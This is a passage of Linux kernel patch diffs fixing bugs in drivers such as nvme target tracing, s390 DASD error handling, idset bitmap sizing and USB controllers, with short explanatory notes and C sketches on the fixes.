+ 
+@@ -224,8 +224,8 @@ const char *nvmet_trace_ctrl_name(struct trace_seq *p, struct nvmet_ctrl *ctrl)
+ 	 * If we can know the extra data of the connect command in this stage,
+ 	 * we can update this print statement later.
+ 	 */
+-	if (ctrl)
+-		trace_seq_printf(p, "%d", ctrl->cntlid);
++	if (ctrl_id)
++		trace_seq_printf(p, "%d", ctrl_id);
+ 	else
+ 		trace_seq_printf(p, "_");
+ 	trace_seq_putc(p, 0);
+diff --git a/drivers/nvme/target/trace.h b/drivers/nvme/target/trace.h
+index 974d99d47f514..7f7ebf9558e50 100644
+--- a/drivers/nvme/target/trace.h
++++ b/drivers/nvme/target/trace.h
+@@ -32,18 +32,24 @@ const char *nvmet_trace_parse_fabrics_cmd(struct trace_seq *p, u8 fctype,
+ 	 nvmet_trace_parse_nvm_cmd(p, opcode, cdw10) :			\
+ 	 nvmet_trace_parse_admin_cmd(p, opcode, cdw10)))
+ 
+-const char *nvmet_trace_ctrl_name(struct trace_seq *p, struct nvmet_ctrl *ctrl);
+-#define __print_ctrl_name(ctrl)				\
+-	nvmet_trace_ctrl_name(p, ctrl)
++const char *nvmet_trace_ctrl_id(struct trace_seq *p, u16 ctrl_id);
++#define __print_ctrl_id(ctrl_id)			\
++	nvmet_trace_ctrl_id(p, ctrl_id)
+ 
+ const char *nvmet_trace_disk_name(struct trace_seq *p, char *name);
+ #define __print_disk_name(name)				\
+ 	nvmet_trace_disk_name(p, name)
+ 
+ #ifndef TRACE_HEADER_MULTI_READ
+-static inline struct nvmet_ctrl *nvmet_req_to_ctrl(struct nvmet_req *req)
++static inline u16 nvmet_req_to_ctrl_id(struct nvmet_req *req)
+ {
+-	return req->sq->ctrl;
++	/*
++	 * The queue and controller pointers are not valid until an association
++	 * has been established.
++	 */
++	if (!req->sq || !req->sq->ctrl)
++		return 0;
++	return req->sq->ctrl->cntlid;
+ }
+ 
+ static inline void __assign_req_name(char *name, struct nvmet_req *req)
+@@ -62,7 +68,7 @@ TRACE_EVENT(nvmet_req_init,
+ 	TP_ARGS(req, cmd),
+ 	TP_STRUCT__entry(
+ 		__field(struct nvme_command *, cmd)
+-		__field(struct nvmet_ctrl *, ctrl)
++		__field(u16, ctrl_id)
+ 		__array(char, disk, DISK_NAME_LEN)
+ 		__field(int, qid)
+ 		__field(u16, cid)
+@@ -75,7 +81,7 @@ TRACE_EVENT(nvmet_req_init,
+ 	),
+ 	TP_fast_assign(
+ 		__entry->cmd = cmd;
+-		__entry->ctrl = nvmet_req_to_ctrl(req);
++		__entry->ctrl_id = nvmet_req_to_ctrl_id(req);
+ 		__assign_req_name(__entry->disk, req);
+ 		__entry->qid = req->sq->qid;
+ 		__entry->cid = cmd->common.command_id;
+@@ -89,7 +95,7 @@ TRACE_EVENT(nvmet_req_init,
+ 	),
+ 	TP_printk("nvmet%s: %sqid=%d, cmdid=%u, nsid=%u, flags=%#x, "
+ 		  "meta=%#llx, cmd=(%s, %s)",
+-		__print_ctrl_name(__entry->ctrl),
++		__print_ctrl_id(__entry->ctrl_id),
+ 		__print_disk_name(__entry->disk),
+ 		__entry->qid, __entry->cid, __entry->nsid,
+ 		__entry->flags, __entry->metadata,
+@@ -103,7 +109,7 @@ TRACE_EVENT(nvmet_req_complete,
+ 	TP_PROTO(struct nvmet_req *req),
+ 	TP_ARGS(req),
+ 	TP_STRUCT__entry(
+-		__field(struct nvmet_ctrl *, ctrl)
++		__field(u16, ctrl_id)
+ 		__array(char, disk, DISK_NAME_LEN)
+ 		__field(int, qid)
+ 		__field(int, cid)
+@@ -111,7 +117,7 @@ TRACE_EVENT(nvmet_req_complete,
+ 		__field(u16, status)
+ 	),
+ 	TP_fast_assign(
+-		__entry->ctrl = nvmet_req_to_ctrl(req);
++		__entry->ctrl_id = nvmet_req_to_ctrl_id(req);
+ 		__entry->qid = req->cq->qid;
+ 		__entry->cid = req->cqe->command_id;
+ 		__entry->result = le64_to_cpu(req->cqe->result.u64);
+@@ -119,7 +125,7 @@ TRACE_EVENT(nvmet_req_complete,
+ 		__assign_req_name(__entry->disk, req);
+ 	),
+ 	TP_printk("nvmet%s: %sqid=%d, cmdid=%u, res=%#llx, status=%#x",
+-		__print_ctrl_name(__entry->ctrl),
++		__print_ctrl_id(__entry->ctrl_id),
+ 		__print_disk_name(__entry->disk),
+ 		__entry->qid, __entry->cid, __entry->result, __entry->status)
+ 
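
The trace.h change above follows a general tracepoint rule: capture scalars
at event time rather than pointers that get dereferenced at print time, when
the object may already be freed (or, before an association exists, was never
valid). A reduced sketch of the record-layout difference, with illustrative
types:

#include <stdint.h>

struct demo_ctrl {
	uint16_t cntlid;
};

/* Bad: the trace ring buffer outlives the controller, so dereferencing
 * this when the event is printed can be a use-after-free.
 */
struct demo_rec_bad {
	struct demo_ctrl *ctrl;
};

/* Good: the ID is snapshotted while the pointer is still valid. */
struct demo_rec_good {
	uint16_t ctrl_id;
};

static uint16_t demo_ctrl_id(const struct demo_ctrl *ctrl)
{
	return ctrl ? ctrl->cntlid : 0;	/* 0 is printed as "_" */
}
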
+diff --git a/drivers/platform/surface/aggregator/controller.c b/drivers/platform/surface/aggregator/controller.c
+index 30cea324ff95f..a6a8f4b1836a6 100644
+--- a/drivers/platform/surface/aggregator/controller.c
++++ b/drivers/platform/surface/aggregator/controller.c
+@@ -1354,7 +1354,8 @@ void ssam_controller_destroy(struct ssam_controller *ctrl)
+ 	if (ctrl->state == SSAM_CONTROLLER_UNINITIALIZED)
+ 		return;
+ 
+-	WARN_ON(ctrl->state != SSAM_CONTROLLER_STOPPED);
++	WARN_ON(ctrl->state != SSAM_CONTROLLER_STOPPED &&
++		ctrl->state != SSAM_CONTROLLER_INITIALIZED);
+ 
+ 	/*
+ 	 * Note: New events could still have been received after the previous
+diff --git a/drivers/platform/x86/lg-laptop.c b/drivers/platform/x86/lg-laptop.c
+index 2e1dc91bfc764..5704981d18487 100644
+--- a/drivers/platform/x86/lg-laptop.c
++++ b/drivers/platform/x86/lg-laptop.c
+@@ -715,7 +715,7 @@ static int acpi_add(struct acpi_device *device)
+ 		default:
+ 			year = 2019;
+ 		}
+-	pr_info("product: %s  year: %d\n", product, year);
++	pr_info("product: %s  year: %d\n", product ?: "unknown", year);
+ 
+ 	if (year >= 2019)
+ 		battery_limit_use_wmbb = 1;
+diff --git a/drivers/rtc/rtc-nct3018y.c b/drivers/rtc/rtc-nct3018y.c
+index d43acd3920ed3..108eced8f0030 100644
+--- a/drivers/rtc/rtc-nct3018y.c
++++ b/drivers/rtc/rtc-nct3018y.c
+@@ -99,6 +99,8 @@ static int nct3018y_get_alarm_mode(struct i2c_client *client, unsigned char *ala
+ 		if (flags < 0)
+ 			return flags;
+ 		*alarm_enable = flags & NCT3018Y_BIT_AIE;
++		dev_dbg(&client->dev, "%s:alarm_enable:%x\n", __func__, *alarm_enable);
++
+ 	}
+ 
+ 	if (alarm_flag) {
+@@ -107,11 +109,9 @@ static int nct3018y_get_alarm_mode(struct i2c_client *client, unsigned char *ala
+ 		if (flags < 0)
+ 			return flags;
+ 		*alarm_flag = flags & NCT3018Y_BIT_AF;
++		dev_dbg(&client->dev, "%s:alarm_flag:%x\n", __func__, *alarm_flag);
+ 	}
+ 
+-	dev_dbg(&client->dev, "%s:alarm_enable:%x alarm_flag:%x\n",
+-		__func__, *alarm_enable, *alarm_flag);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index 341d65acd715d..4250671e4400d 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -1597,9 +1597,15 @@ static int dasd_ese_needs_format(struct dasd_block *block, struct irb *irb)
+ 	if (!sense)
+ 		return 0;
+ 
+-	return !!(sense[1] & SNS1_NO_REC_FOUND) ||
+-		!!(sense[1] & SNS1_FILE_PROTECTED) ||
+-		scsw_cstat(&irb->scsw) == SCHN_STAT_INCORR_LEN;
++	if (sense[1] & SNS1_NO_REC_FOUND)
++		return 1;
++
++	if ((sense[1] & SNS1_INV_TRACK_FORMAT) &&
++	    scsw_is_tm(&irb->scsw) &&
++	    !(sense[2] & SNS2_ENV_DATA_PRESENT))
++		return 1;
++
++	return 0;
+ }
+ 
+ static int dasd_ese_oos_cond(u8 *sense)
+@@ -1620,7 +1626,7 @@ void dasd_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 	struct dasd_device *device;
+ 	unsigned long now;
+ 	int nrf_suppressed = 0;
+-	int fp_suppressed = 0;
++	int it_suppressed = 0;
+ 	struct request *req;
+ 	u8 *sense = NULL;
+ 	int expires;
+@@ -1675,8 +1681,9 @@ void dasd_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 		 */
+ 		sense = dasd_get_sense(irb);
+ 		if (sense) {
+-			fp_suppressed = (sense[1] & SNS1_FILE_PROTECTED) &&
+-				test_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags);
++			it_suppressed =	(sense[1] & SNS1_INV_TRACK_FORMAT) &&
++				!(sense[2] & SNS2_ENV_DATA_PRESENT) &&
++				test_bit(DASD_CQR_SUPPRESS_IT, &cqr->flags);
+ 			nrf_suppressed = (sense[1] & SNS1_NO_REC_FOUND) &&
+ 				test_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags);
+ 
+@@ -1691,7 +1698,7 @@ void dasd_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 				return;
+ 			}
+ 		}
+-		if (!(fp_suppressed || nrf_suppressed))
++		if (!(it_suppressed || nrf_suppressed))
+ 			device->discipline->dump_sense_dbf(device, irb, "int");
+ 
+ 		if (device->features & DASD_FEATURE_ERPLOG)
+@@ -2452,14 +2459,17 @@ static int _dasd_sleep_on_queue(struct list_head *ccw_queue, int interruptible)
+ 	rc = 0;
+ 	list_for_each_entry_safe(cqr, n, ccw_queue, blocklist) {
+ 		/*
+-		 * In some cases the 'File Protected' or 'Incorrect Length'
+-		 * error might be expected and error recovery would be
+-		 * unnecessary in these cases.	Check if the according suppress
+-		 * bit is set.
++		 * In some cases certain errors might be expected and
++		 * error recovery would be unnecessary in these cases.
++		 * Check if the according suppress bit is set.
+ 		 */
+ 		sense = dasd_get_sense(&cqr->irb);
+-		if (sense && sense[1] & SNS1_FILE_PROTECTED &&
+-		    test_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags))
++		if (sense && (sense[1] & SNS1_INV_TRACK_FORMAT) &&
++		    !(sense[2] & SNS2_ENV_DATA_PRESENT) &&
++		    test_bit(DASD_CQR_SUPPRESS_IT, &cqr->flags))
++			continue;
++		if (sense && (sense[1] & SNS1_NO_REC_FOUND) &&
++		    test_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags))
+ 			continue;
+ 		if (scsw_cstat(&cqr->irb.scsw) == 0x40 &&
+ 		    test_bit(DASD_CQR_SUPPRESS_IL, &cqr->flags))
+diff --git a/drivers/s390/block/dasd_3990_erp.c b/drivers/s390/block/dasd_3990_erp.c
+index 91cb9d52a4250..b96044fb1a3af 100644
+--- a/drivers/s390/block/dasd_3990_erp.c
++++ b/drivers/s390/block/dasd_3990_erp.c
+@@ -1406,14 +1406,8 @@ dasd_3990_erp_file_prot(struct dasd_ccw_req * erp)
+ 
+ 	struct dasd_device *device = erp->startdev;
+ 
+-	/*
+-	 * In some cases the 'File Protected' error might be expected and
+-	 * log messages shouldn't be written then.
+-	 * Check if the according suppress bit is set.
+-	 */
+-	if (!test_bit(DASD_CQR_SUPPRESS_FP, &erp->flags))
+-		dev_err(&device->cdev->dev,
+-			"Accessing the DASD failed because of a hardware error\n");
++	dev_err(&device->cdev->dev,
++		"Accessing the DASD failed because of a hardware error\n");
+ 
+ 	return dasd_3990_erp_cleanup(erp, DASD_CQR_FAILED);
+ 
+diff --git a/drivers/s390/block/dasd_diag.c b/drivers/s390/block/dasd_diag.c
+index f956a4ac9881a..5802aead09f36 100644
+--- a/drivers/s390/block/dasd_diag.c
++++ b/drivers/s390/block/dasd_diag.c
+@@ -639,7 +639,6 @@ static void dasd_diag_setup_blk_queue(struct dasd_block *block)
+ 	/* With page sized segments each segment can be translated into one idaw/tidaw */
+ 	blk_queue_max_segment_size(q, PAGE_SIZE);
+ 	blk_queue_segment_boundary(q, PAGE_SIZE - 1);
+-	blk_queue_dma_alignment(q, PAGE_SIZE - 1);
+ }
+ 
+ static int dasd_diag_pe_handler(struct dasd_device *device,
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index c5619751a0658..67f04f0b38176 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -2288,6 +2288,7 @@ dasd_eckd_analysis_ccw(struct dasd_device *device)
+ 	cqr->status = DASD_CQR_FILLED;
+ 	/* Set flags to suppress output for expected errors */
+ 	set_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags);
++	set_bit(DASD_CQR_SUPPRESS_IT, &cqr->flags);
+ 
+ 	return cqr;
+ }
+@@ -2569,7 +2570,6 @@ dasd_eckd_build_check_tcw(struct dasd_device *base, struct format_data_t *fdata,
+ 	cqr->buildclk = get_tod_clock();
+ 	cqr->status = DASD_CQR_FILLED;
+ 	/* Set flags to suppress output for expected errors */
+-	set_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags);
+ 	set_bit(DASD_CQR_SUPPRESS_IL, &cqr->flags);
+ 
+ 	return cqr;
+@@ -4145,8 +4145,6 @@ static struct dasd_ccw_req *dasd_eckd_build_cp_cmd_single(
+ 
+ 	/* Set flags to suppress output for expected errors */
+ 	if (dasd_eckd_is_ese(basedev)) {
+-		set_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags);
+-		set_bit(DASD_CQR_SUPPRESS_IL, &cqr->flags);
+ 		set_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags);
+ 	}
+ 
+@@ -4648,9 +4646,8 @@ static struct dasd_ccw_req *dasd_eckd_build_cp_tpm_track(
+ 
+ 	/* Set flags to suppress output for expected errors */
+ 	if (dasd_eckd_is_ese(basedev)) {
+-		set_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags);
+-		set_bit(DASD_CQR_SUPPRESS_IL, &cqr->flags);
+ 		set_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags);
++		set_bit(DASD_CQR_SUPPRESS_IT, &cqr->flags);
+ 	}
+ 
+ 	return cqr;
+@@ -5821,36 +5818,32 @@ static void dasd_eckd_dump_sense(struct dasd_device *device,
+ {
+ 	u8 *sense = dasd_get_sense(irb);
+ 
+-	if (scsw_is_tm(&irb->scsw)) {
+-		/*
+-		 * In some cases the 'File Protected' or 'Incorrect Length'
+-		 * error might be expected and log messages shouldn't be written
+-		 * then. Check if the according suppress bit is set.
+-		 */
+-		if (sense && (sense[1] & SNS1_FILE_PROTECTED) &&
+-		    test_bit(DASD_CQR_SUPPRESS_FP, &req->flags))
+-			return;
+-		if (scsw_cstat(&irb->scsw) == 0x40 &&
+-		    test_bit(DASD_CQR_SUPPRESS_IL, &req->flags))
+-			return;
++	/*
++	 * In some cases certain errors might be expected and
++	 * log messages shouldn't be written then.
++	 * Check if the according suppress bit is set.
++	 */
++	if (sense && (sense[1] & SNS1_INV_TRACK_FORMAT) &&
++	    !(sense[2] & SNS2_ENV_DATA_PRESENT) &&
++	    test_bit(DASD_CQR_SUPPRESS_IT, &req->flags))
++		return;
+ 
+-		dasd_eckd_dump_sense_tcw(device, req, irb);
+-	} else {
+-		/*
+-		 * In some cases the 'Command Reject' or 'No Record Found'
+-		 * error might be expected and log messages shouldn't be
+-		 * written then. Check if the according suppress bit is set.
+-		 */
+-		if (sense && sense[0] & SNS0_CMD_REJECT &&
+-		    test_bit(DASD_CQR_SUPPRESS_CR, &req->flags))
+-			return;
++	if (sense && sense[0] & SNS0_CMD_REJECT &&
++	    test_bit(DASD_CQR_SUPPRESS_CR, &req->flags))
++		return;
+ 
+-		if (sense && sense[1] & SNS1_NO_REC_FOUND &&
+-		    test_bit(DASD_CQR_SUPPRESS_NRF, &req->flags))
+-			return;
++	if (sense && sense[1] & SNS1_NO_REC_FOUND &&
++	    test_bit(DASD_CQR_SUPPRESS_NRF, &req->flags))
++		return;
+ 
++	if (scsw_cstat(&irb->scsw) == 0x40 &&
++	    test_bit(DASD_CQR_SUPPRESS_IL, &req->flags))
++		return;
++
++	if (scsw_is_tm(&irb->scsw))
++		dasd_eckd_dump_sense_tcw(device, req, irb);
++	else
+ 		dasd_eckd_dump_sense_ccw(device, req, irb);
+-	}
+ }
+ 
+ static int dasd_eckd_reload_device(struct dasd_device *device)
+@@ -6896,7 +6889,6 @@ static void dasd_eckd_setup_blk_queue(struct dasd_block *block)
+ 	/* With page sized segments each segment can be translated into one idaw/tidaw */
+ 	blk_queue_max_segment_size(q, PAGE_SIZE);
+ 	blk_queue_segment_boundary(q, PAGE_SIZE - 1);
+-	blk_queue_dma_alignment(q, PAGE_SIZE - 1);
+ }
+ 
+ static struct ccw_driver dasd_eckd_driver = {
+diff --git a/drivers/s390/block/dasd_int.h b/drivers/s390/block/dasd_int.h
+index 00bcd177264ac..7823e6c06e29c 100644
+--- a/drivers/s390/block/dasd_int.h
++++ b/drivers/s390/block/dasd_int.h
+@@ -225,7 +225,7 @@ struct dasd_ccw_req {
+  * The following flags are used to suppress output of certain errors.
+  */
+ #define DASD_CQR_SUPPRESS_NRF	4	/* Suppress 'No Record Found' error */
+-#define DASD_CQR_SUPPRESS_FP	5	/* Suppress 'File Protected' error*/
++#define DASD_CQR_SUPPRESS_IT	5	/* Suppress 'Invalid Track' error*/
+ #define DASD_CQR_SUPPRESS_IL	6	/* Suppress 'Incorrect Length' error */
+ #define DASD_CQR_SUPPRESS_CR	7	/* Suppress 'Command Reject' error */
+ 
+diff --git a/drivers/s390/cio/idset.c b/drivers/s390/cio/idset.c
+index 45f9c0736be4f..e5f28370a9039 100644
+--- a/drivers/s390/cio/idset.c
++++ b/drivers/s390/cio/idset.c
+@@ -16,20 +16,21 @@ struct idset {
+ 	unsigned long bitmap[];
+ };
+ 
+-static inline unsigned long bitmap_size(int num_ssid, int num_id)
++static inline unsigned long idset_bitmap_size(int num_ssid, int num_id)
+ {
+-	return BITS_TO_LONGS(num_ssid * num_id) * sizeof(unsigned long);
++	return bitmap_size(size_mul(num_ssid, num_id));
+ }
+ 
+ static struct idset *idset_new(int num_ssid, int num_id)
+ {
+ 	struct idset *set;
+ 
+-	set = vmalloc(sizeof(struct idset) + bitmap_size(num_ssid, num_id));
++	set = vmalloc(sizeof(struct idset) +
++		      idset_bitmap_size(num_ssid, num_id));
+ 	if (set) {
+ 		set->num_ssid = num_ssid;
+ 		set->num_id = num_id;
+-		memset(set->bitmap, 0, bitmap_size(num_ssid, num_id));
++		memset(set->bitmap, 0, idset_bitmap_size(num_ssid, num_id));
+ 	}
+ 	return set;
+ }
+@@ -41,7 +42,8 @@ void idset_free(struct idset *set)
+ 
+ void idset_fill(struct idset *set)
+ {
+-	memset(set->bitmap, 0xff, bitmap_size(set->num_ssid, set->num_id));
++	memset(set->bitmap, 0xff,
++	       idset_bitmap_size(set->num_ssid, set->num_id));
+ }
+ 
+ static inline void idset_add(struct idset *set, int ssid, int id)
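
The idset change above routes the bitmap sizing through size_mul(), which
saturates at SIZE_MAX on overflow, so a huge num_ssid * num_id product makes
the later vmalloc() fail cleanly instead of allocating a too-small bitmap. A
minimal sketch of that sizing, using the same kernel helpers the hunk calls:

#include <linux/overflow.h>
#include <linux/bitmap.h>

static unsigned long demo_bitmap_bytes(int num_ssid, int num_id)
{
	/* bits -> longs -> bytes, with the multiplication checked */
	return bitmap_size(size_mul(num_ssid, num_id));
}
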
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 47b8102a7063a..587e3c2f7c48c 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -7596,7 +7596,7 @@ lpfc_sli4_repost_sgl_list(struct lpfc_hba *phba,
+ 	struct lpfc_sglq *sglq_entry = NULL;
+ 	struct lpfc_sglq *sglq_entry_next = NULL;
+ 	struct lpfc_sglq *sglq_entry_first = NULL;
+-	int status, total_cnt;
++	int status = 0, total_cnt;
+ 	int post_cnt = 0, num_posted = 0, block_cnt = 0;
+ 	int last_xritag = NO_XRI;
+ 	LIST_HEAD(prep_sgl_list);
+diff --git a/drivers/scsi/scsi_transport_spi.c b/drivers/scsi/scsi_transport_spi.c
+index f569cf0095c28..a95a35635c333 100644
+--- a/drivers/scsi/scsi_transport_spi.c
++++ b/drivers/scsi/scsi_transport_spi.c
+@@ -677,10 +677,10 @@ spi_dv_device_echo_buffer(struct scsi_device *sdev, u8 *buffer,
+ 	for (r = 0; r < retries; r++) {
+ 		result = spi_execute(sdev, spi_write_buffer, DMA_TO_DEVICE,
+ 				     buffer, len, &sshdr);
+-		if(result || !scsi_device_online(sdev)) {
++		if (result || !scsi_device_online(sdev)) {
+ 
+ 			scsi_device_set_state(sdev, SDEV_QUIESCE);
+-			if (scsi_sense_valid(&sshdr)
++			if (result > 0 && scsi_sense_valid(&sshdr)
+ 			    && sshdr.sense_key == ILLEGAL_REQUEST
+ 			    /* INVALID FIELD IN CDB */
+ 			    && sshdr.asc == 0x24 && sshdr.ascq == 0x00)
+diff --git a/drivers/soc/imx/imx93-pd.c b/drivers/soc/imx/imx93-pd.c
+index 4d235c8c4924d..46c47f645fafc 100644
+--- a/drivers/soc/imx/imx93-pd.c
++++ b/drivers/soc/imx/imx93-pd.c
+@@ -20,6 +20,7 @@
+ #define FUNC_STAT_PSW_STAT_MASK		BIT(0)
+ #define FUNC_STAT_RST_STAT_MASK		BIT(2)
+ #define FUNC_STAT_ISO_STAT_MASK		BIT(4)
++#define FUNC_STAT_SSAR_STAT_MASK	BIT(8)
+ 
+ struct imx93_power_domain {
+ 	struct generic_pm_domain genpd;
+@@ -50,7 +51,7 @@ static int imx93_pd_on(struct generic_pm_domain *genpd)
+ 	writel(val, addr + MIX_SLICE_SW_CTRL_OFF);
+ 
+ 	ret = readl_poll_timeout(addr + MIX_FUNC_STAT_OFF, val,
+-				 !(val & FUNC_STAT_ISO_STAT_MASK), 1, 10000);
++				 !(val & FUNC_STAT_SSAR_STAT_MASK), 1, 10000);
+ 	if (ret) {
+ 		dev_err(domain->dev, "pd_on timeout: name: %s, stat: %x\n", genpd->name, val);
+ 		return ret;
+@@ -72,7 +73,7 @@ static int imx93_pd_off(struct generic_pm_domain *genpd)
+ 	writel(val, addr + MIX_SLICE_SW_CTRL_OFF);
+ 
+ 	ret = readl_poll_timeout(addr + MIX_FUNC_STAT_OFF, val,
+-				 val & FUNC_STAT_PSW_STAT_MASK, 1, 1000);
++				 val & FUNC_STAT_PSW_STAT_MASK, 1, 10000);
+ 	if (ret) {
+ 		dev_err(domain->dev, "pd_off timeout: name: %s, stat: %x\n", genpd->name, val);
+ 		return ret;
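
The imx93-pd hunks above poll a status register with readl_poll_timeout(),
which re-reads until the condition holds, waiting about 1us between reads and
giving up after 10ms. A sketch of that usage; the offset and status bit are
placeholders, not the i.MX93 layout:

#include <linux/iopoll.h>
#include <linux/io.h>
#include <linux/bits.h>

#define DEMO_STAT_OFF   0x0004
#define DEMO_SSAR_STAT  BIT(8)

static int demo_wait_power_on(void __iomem *base)
{
	u32 val;

	/* succeed once the save/restore (SSAR) handshake has completed */
	return readl_poll_timeout(base + DEMO_STAT_OFF, val,
				  !(val & DEMO_SSAR_STAT), 1, 10000);
}
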
+diff --git a/drivers/ssb/main.c b/drivers/ssb/main.c
+index 8a93c83cb6f80..d52e91258e989 100644
+--- a/drivers/ssb/main.c
++++ b/drivers/ssb/main.c
+@@ -837,7 +837,7 @@ static u32 clkfactor_f6_resolve(u32 v)
+ 	case SSB_CHIPCO_CLK_F6_7:
+ 		return 7;
+ 	}
+-	return 0;
++	return 1;
+ }
+ 
+ /* Calculate the speed the backplane would run at a given set of clockcontrol values */
+diff --git a/drivers/staging/iio/resolver/ad2s1210.c b/drivers/staging/iio/resolver/ad2s1210.c
+index 636c45b128438..afe89c91c89ea 100644
+--- a/drivers/staging/iio/resolver/ad2s1210.c
++++ b/drivers/staging/iio/resolver/ad2s1210.c
+@@ -657,9 +657,6 @@ static int ad2s1210_probe(struct spi_device *spi)
+ 	if (!indio_dev)
+ 		return -ENOMEM;
+ 	st = iio_priv(indio_dev);
+-	ret = ad2s1210_setup_gpios(st);
+-	if (ret < 0)
+-		return ret;
+ 
+ 	spi_set_drvdata(spi, indio_dev);
+ 
+@@ -670,6 +667,10 @@ static int ad2s1210_probe(struct spi_device *spi)
+ 	st->resolution = 12;
+ 	st->fexcit = AD2S1210_DEF_EXCIT;
+ 
++	ret = ad2s1210_setup_gpios(st);
++	if (ret < 0)
++		return ret;
++
+ 	indio_dev->info = &ad2s1210_info;
+ 	indio_dev->modes = INDIO_DIRECT_MODE;
+ 	indio_dev->channels = ad2s1210_channels;
+diff --git a/drivers/staging/ks7010/ks7010_sdio.c b/drivers/staging/ks7010/ks7010_sdio.c
+index 9fb118e77a1f0..f1d44e4955fc6 100644
+--- a/drivers/staging/ks7010/ks7010_sdio.c
++++ b/drivers/staging/ks7010/ks7010_sdio.c
+@@ -395,9 +395,9 @@ int ks_wlan_hw_tx(struct ks_wlan_private *priv, void *p, unsigned long size,
+ 	priv->hostt.buff[priv->hostt.qtail] = le16_to_cpu(hdr->event);
+ 	priv->hostt.qtail = (priv->hostt.qtail + 1) % SME_EVENT_BUFF_SIZE;
+ 
+-	spin_lock(&priv->tx_dev.tx_dev_lock);
++	spin_lock_bh(&priv->tx_dev.tx_dev_lock);
+ 	result = enqueue_txdev(priv, p, size, complete_handler, skb);
+-	spin_unlock(&priv->tx_dev.tx_dev_lock);
++	spin_unlock_bh(&priv->tx_dev.tx_dev_lock);
+ 
+ 	if (txq_has_space(priv))
+ 		queue_delayed_work(priv->wq, &priv->rw_dwork, 0);
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index d3058ede53064..3c2035fc9cee3 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -3086,6 +3086,7 @@ void tb_switch_remove(struct tb_switch *sw)
+ 			tb_switch_remove(port->remote->sw);
+ 			port->remote = NULL;
+ 		} else if (port->xdomain) {
++			port->xdomain->is_unplugged = true;
+ 			tb_xdomain_remove(port->xdomain);
+ 			port->xdomain = NULL;
+ 		}
+diff --git a/drivers/tty/serial/atmel_serial.c b/drivers/tty/serial/atmel_serial.c
+index fbce8ef205ce6..6a9310379dc2b 100644
+--- a/drivers/tty/serial/atmel_serial.c
++++ b/drivers/tty/serial/atmel_serial.c
+@@ -2539,7 +2539,7 @@ static const struct uart_ops atmel_pops = {
+ };
+ 
+ static const struct serial_rs485 atmel_rs485_supported = {
+-	.flags = SER_RS485_ENABLED | SER_RS485_RTS_AFTER_SEND | SER_RS485_RX_DURING_TX,
++	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND | SER_RS485_RX_DURING_TX,
+ 	.delay_rts_before_send = 1,
+ 	.delay_rts_after_send = 1,
+ };
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 94bc7786a3c4e..4964fa7419efa 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -506,6 +506,13 @@ static void dwc3_free_event_buffers(struct dwc3 *dwc)
+ static int dwc3_alloc_event_buffers(struct dwc3 *dwc, unsigned int length)
+ {
+ 	struct dwc3_event_buffer *evt;
++	unsigned int hw_mode;
++
++	hw_mode = DWC3_GHWPARAMS0_MODE(dwc->hwparams.hwparams0);
++	if (hw_mode == DWC3_GHWPARAMS0_MODE_HOST) {
++		dwc->ev_buf = NULL;
++		return 0;
++	}
+ 
+ 	evt = dwc3_alloc_one_event_buffer(dwc, length);
+ 	if (IS_ERR(evt)) {
+@@ -527,6 +534,9 @@ int dwc3_event_buffers_setup(struct dwc3 *dwc)
+ {
+ 	struct dwc3_event_buffer	*evt;
+ 
++	if (!dwc->ev_buf)
++		return 0;
++
+ 	evt = dwc->ev_buf;
+ 	evt->lpos = 0;
+ 	dwc3_writel(dwc->regs, DWC3_GEVNTADRLO(0),
+@@ -544,6 +554,9 @@ void dwc3_event_buffers_cleanup(struct dwc3 *dwc)
+ {
+ 	struct dwc3_event_buffer	*evt;
+ 
++	if (!dwc->ev_buf)
++		return;
++
+ 	evt = dwc->ev_buf;
+ 
+ 	evt->lpos = 0;
+diff --git a/drivers/usb/gadget/udc/fsl_udc_core.c b/drivers/usb/gadget/udc/fsl_udc_core.c
+index a67873a074b7b..c1a62ebd78d66 100644
+--- a/drivers/usb/gadget/udc/fsl_udc_core.c
++++ b/drivers/usb/gadget/udc/fsl_udc_core.c
+@@ -2487,7 +2487,7 @@ static int fsl_udc_probe(struct platform_device *pdev)
+ 	/* setup the udc->eps[] for non-control endpoints and link
+ 	 * to gadget.ep_list */
+ 	for (i = 1; i < (int)(udc_controller->max_ep / 2); i++) {
+-		char name[14];
++		char name[16];
+ 
+ 		sprintf(name, "ep%dout", i);
+ 		struct_ep_setup(udc_controller, i * 2, name, 1);
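
The fsl_udc buffer bump above answers gcc's -Wformat-truncation arithmetic:
"ep%dout" with a positive int needs up to 2 + 10 digits + 3 + 1 = 16 bytes,
so the old char[14] could truncate. A runnable sketch with the bound made
explicit via snprintf:

#include <stdio.h>

int main(void)
{
	/* "ep" + up to 10 digits of a positive int + "out" + NUL = 16 */
	char name[16];
	int i = 3;

	snprintf(name, sizeof(name), "ep%dout", i);	/* bound is explicit */
	printf("%s\n", name);	/* ep3out */
	return 0;
}
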
